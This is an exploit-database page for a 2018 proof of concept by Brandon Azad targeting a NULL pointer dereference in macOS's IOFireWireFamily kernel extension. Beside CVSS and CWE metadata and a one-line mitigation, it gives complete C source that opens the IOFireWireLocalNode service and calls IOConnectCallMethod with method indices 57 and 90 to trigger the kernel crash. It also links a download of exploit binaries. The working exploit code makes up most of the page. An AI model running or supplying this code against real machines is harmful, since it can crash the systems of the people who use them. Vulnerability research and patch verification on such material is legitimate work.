IOFireWireFamily-null-deref.c

vendor:

IOFireWireFamily

by:

Brandon Azad

7,8

CVSS

HIGH

NULL pointer dereference

476

CWE

Product Name: IOFireWireFamily

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2018

IOFireWireFamily-null-deref.c

IOFireWireUserClient::setAsyncRef_IsochChannelForceStop is vulnerable to a NULL pointer dereference. This vulnerability can be triggered by calling IOConnectCallMethod with a method index of 90 and a single argument of the handle returned by a previous call to IOConnectCallMethod with a method index of 57.

Mitigation:

Update to the latest version of IOFireWireFamily.

Source

Exploit-DB raw data:

/*
 * IOFireWireFamily-null-deref.c
 * Brandon Azad
 *
 * NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop.
 *
 * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip
*/


#include <IOKit/IOKitLib.h>

int main() {
	int ret = 0;
	io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
			IOServiceMatching("IOFireWireLocalNode"));
	if (service == IO_OBJECT_NULL) {
		ret = 1;
		goto fail1;
	}
	io_connect_t connect;
	kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
	IOObjectRelease(service);
	if (kr != KERN_SUCCESS) {
		ret = 2;
		goto fail1;
	}
	// isochChannel_Create
	uint64_t args[3] = { 0, 0x100, 0x100 };
	uint64_t handle = 0;
	uint32_t output_count = 1;
	kr = IOConnectCallMethod(connect, 57,
			args, sizeof(args) / sizeof(*args), NULL, 0,
			&handle, &output_count, NULL, NULL);
	if (kr != KERN_SUCCESS) {
		ret = 3;
		goto fail2;
	}
	// setAsyncRef_IsochChannelForceStop
	kr = IOConnectCallMethod(connect, 90,
			&handle, 1, NULL, 0,
			NULL, NULL, NULL, NULL);
	if (kr != KERN_SUCCESS) {
		ret = 4;
		goto fail2;
	}
fail2:
	IOServiceClose(connect);
fail1:
	return ret;
}